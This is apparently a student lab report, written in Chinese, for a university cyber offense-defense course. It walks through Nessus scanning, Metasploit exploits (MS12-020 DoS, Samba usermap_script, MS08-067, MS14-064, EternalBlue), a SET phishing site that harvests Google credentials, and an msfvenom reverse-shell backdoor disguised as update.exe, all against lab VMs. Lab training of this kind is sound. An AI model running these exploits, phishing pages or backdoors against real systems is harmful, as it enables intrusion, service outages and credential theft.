西工大网络空间实战攻防能力训练(Actual Combat Ability Training of Cybersecurity Offense-defense Confrontation)系列实验
双栏图片格式出了大问题,但我懒得改了。
作业 1:扫描漏洞
扫描网络漏洞
新建名为 Network Scan 策略,扫描网络漏洞,并导出漏洞文件。
在 root 下使用 systemctl start nessusd 启动服务,打开 Nessus,点击右上角“New Scan” :

选择“Basic Network Scan”:

将扫描命名为 Network Scan,扫描 192.168.186.0/24 网段,最后保存:

运行扫描:

扫描结果如下,其中 192.168.186.134 为 Win7 主机,192.168.186.135 为 WinXP 主机,192.168.186.129 为 Kali 主机:

点击界面右上角“Export”,导出 .nessus 格式的扫描报告:

点击界面右上角“Report”,选择导出的报告文件类型和格式:


扫描 Windows 系统漏洞
新建名为 Advanced Scan 策略,扫描 Windows 的系统漏洞,并导出漏洞文件。
新建扫描,选择“Advanced Scan”:

命名和网段设置过程相同。保存后运行扫描。

结果如下,其中 192.168.186.134 为 Win7 主机,192.168.186.135 为 WinXP 主机,192.168.186.129 为 Kali 主机:

导出 .nessus 格式的扫描报告:
导出漏洞报告(PDF):

蓝屏攻击 MS12_020
实验环境配置
关闭所有防火墙,并允许 Win7 远程桌面连接:
搜索对应活跃主机 Win7 蓝屏漏洞端口
- 搜索对应活跃主机 Win7 蓝屏漏洞端口
Win7 蓝屏漏洞利用的是 远程桌面默认端口 3389。
ms12-020 漏洞的定义是指操作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定 RDP 包,从而获取超级管理员权限,进而入侵系统,Windows 在处理某些 RDP 报文时 Terminal Server 存在错误,可被利用造成服务停止响应(蓝屏)。
使用 nmap 扫描 Win7 主机,IP 为 192.168.186.134,命令如下:
1 | nmap 192.168.186.134 |

发现 Win7 主机已开启 3389 端口。
Nessus 漏洞扫描
- Nessus 新建名为 Advanced Scan 策略,执行漏洞扫描
新建策略并扫描:

扫描到 Win7 存在 MS12-020 漏洞:

Metasploit 漏洞利用
- Metasploit 漏洞利用(分别使用 msfconsole 和 armitage)
msfconsole
使用如下命令打开 Metasploit:
1 | msfconsole |

使用如下命令,查询渗透测试模块,搜索 MS12-020 漏洞:
1 | search ms12-020 |

发现有两个可利用的模块,使用第一个模块,查看靶机是否符合攻击条件:
1 | use auxiliary/scanner/rdp/ms12_020_check # 或 use 0 |
再使用如下命令设置靶机 IP:
1 | set rhosts 192.168.186.134 |

输入 run 或 exploit 指令进行攻击:

满足要求,可以攻击。
输入以下命令查看攻击配置参数:
1 | show options |

再利用第二个模块,输入 run 或 exploit 指令进行 DoS 攻击:


Win7 主机蓝屏并开始重启倒计时,蓝屏攻击成功。
armitage
安装 armitage:
1 | apt install armitage |
初始化 msf 数据库:
1 | msfdb init |

如若启动失败,可使用如下命令开启 postgresql 服务:
1 | service postgresql start |
启动 armitage:
1 | armitage |

搜索并找到 ms12_020 漏洞,双击并在新打开界面中的“RHOSTS”一栏中,填入攻击目标 IP:

点击“Launch”实施攻击:


攻击成功。
制作钓鱼网站
使用社会工程学制作一个钓鱼网站。
网站模板
使用 Social engineering toolkit 工具:
1 | setoolkit |

选择第一项社工攻击,输入 1 并回车;再选择 2 “Website Attack Vectors(网站攻击向量)”,再选择 3 “Credential Harvester Attack Method(凭证收集攻击方法)”,再选择 1 “Web Templates(网站模板)”:
接下来设置凭证收集器(Kali 攻击机)的 IP 地址为 192.168.186.129:

选择 2 “Google”,建立 Google 网站模板:

在收害机 Win7 上访问 Kali 机的 IP 地址 192.168.186.129,即可访问虚假的谷歌登录页面,输入用户名和密码信息模拟登陆:

点击登录,在 Kali 中可以看到收集到的账号和密码:

网站克隆
在选择“Credential Harvester Attack Method”之后的下一步中,选择 2 “Site Cloner”,输入 Kali 机的 IP 地址 192.168.186.129,再输入要克隆的网址,以“华文慕课”为例:
1 | http://www.chinesemooc.org/ |



对 Metasploitable 渗透攻击
对 metasploitable 渗透攻击——利用 Samba 服务漏洞
安装 Metasploitable 虚拟靶机系统

账号:msfadmin 密码: msfadmin

查看 IP:

1 | 192.168.186.136 |
搜索端口是否开放、漏洞扫描
1 | nmap -sV 192.168.186.136 |

Samba 服务对应端口有 139、445。

扫描服务版本
1 | msfconsole |


成功扫描到开启 Samba 服务的主机。
渗透攻击 Samba 服务
使用 usermap 脚本进行攻击,使用如下命令查找:
1 | search usermap |

开始攻击:
1 | use exploit/multi/samba/usermap_script |

攻击成功,可以查看靶机的文件目录和 IP 地址:
网址链接和监听软件实现渗透攻击
分别通过发送一个网址链接和监听软件实现渗透攻击。
发送网址链接
利用 MS14-064 远程代码执行漏洞攻击 Windows XP 系统,Win XP 的 IP 为:192.168.186.135
打开 metasploit,搜索 ms14-064 漏洞,
选择 exploit/windows/browser/ms14_064_ole_code_execution 模块:
1 | search ms14-064 |

查看设置并进行更改,开始攻击:
1 | show options |

在 Win XP 中打开提供的 URL:
1 | http://192.168.186.129:8080/HSRKEuVZp |


攻击成功。使用如下命令查看目前攻击获得的会话:
1 | sessions -i |

成功链接到 Win XP 主机。
监听软件
利用 msfvenom 生成后门并执行,对 Win7 机进行监听。Win7 机 IP 为:192.168.186.134
在 /var/www/html 下生成名为 update.exe 的木马程序:
1 | msfvenom --payload windows/meterpreter/reverse_tcp LHOST=192.168.186.129 LPORT=8080 -f exe --platform windows --arch x86 -e x86/shikata_ga_nai -i 10 > /var/www/html/update.exe |

在 Kali 上启动 apache 为后门程序提供下载地址:
1 | systemctl start apache2 # Kali 自带 apache 服务器 |
在 MSF 上启动 handler 开始监听后门程序:
1 | msfconsole |


打开 Win7,访问 Kali 搭建的 Web 服务下载执行文件。打开浏览器访问:
1 | http://192.168.186.129/update.exe |
保存 update.exe 文件并运行:
回到 Kali 机,发现攻击成功:


后渗透攻击
利用扫描目标主机上的一种漏洞实现后渗透攻击。
ms08_067_netapi
利用 ms08_067_netapi 远程溢出漏洞进行攻击,攻击目标为 Win XP,IP 为:192.168.186.135
扫描端口和漏洞
1 | nmap -sV 192.168.186.135 |

受害者主机的 SMB 服务端口 445 默认开放。

扫描到 Win XP 主机存在 ms08_067_netapi 远程溢出漏洞。
配置攻击
启动 MSF,搜索针对 ms08_067_netapi 的攻击模块:
1 | msfconsole |

使用该模块,并查看攻击参数、可攻击的系统:
1 | use exploit/windows/smb/ms08_067_netapi |


设置攻击参数:
1 | set RHOST 192.168.186.135 # 攻击目标 |

攻击结果
实施攻击:

攻击失败。445 端口停止服务:

Win XP 主机关闭了 Generic Host Process for Win32 服务:

关闭数据执行保护:

重启 Win XP,此时 445 端口开放:

重新执行攻击:



唯一一次攻击成功。Win XP 出现弹窗,之后重启再攻击则会失败。重装虚拟机也没用。
ms10_046
利用 ms10_046 攻击 Win7:
1 | search ms10_046 |

在 Win7 浏览器中访问 http://192.168.186.129/,会自动打开文件管理器:

双击快捷方式,在 Kali 中会开启会话:

始终没有开启,攻击失败。
ms17-010(永恒之蓝)
1 | search ms17-010 |

对 Win7 攻击失败。
use 2:

在高级设置中关闭防火墙,卸载所有更新:


重新实施攻击:

成功获取 Shell,攻击成功。
可上传恶意文件:
1 | upload /root/.msf4/local/wangyuan.pdf |


彩蛋

- 彩蛋图片:
- 作者:そらに twi@srn_111,pid:7216525
- 来源:pixiv ID: 96279698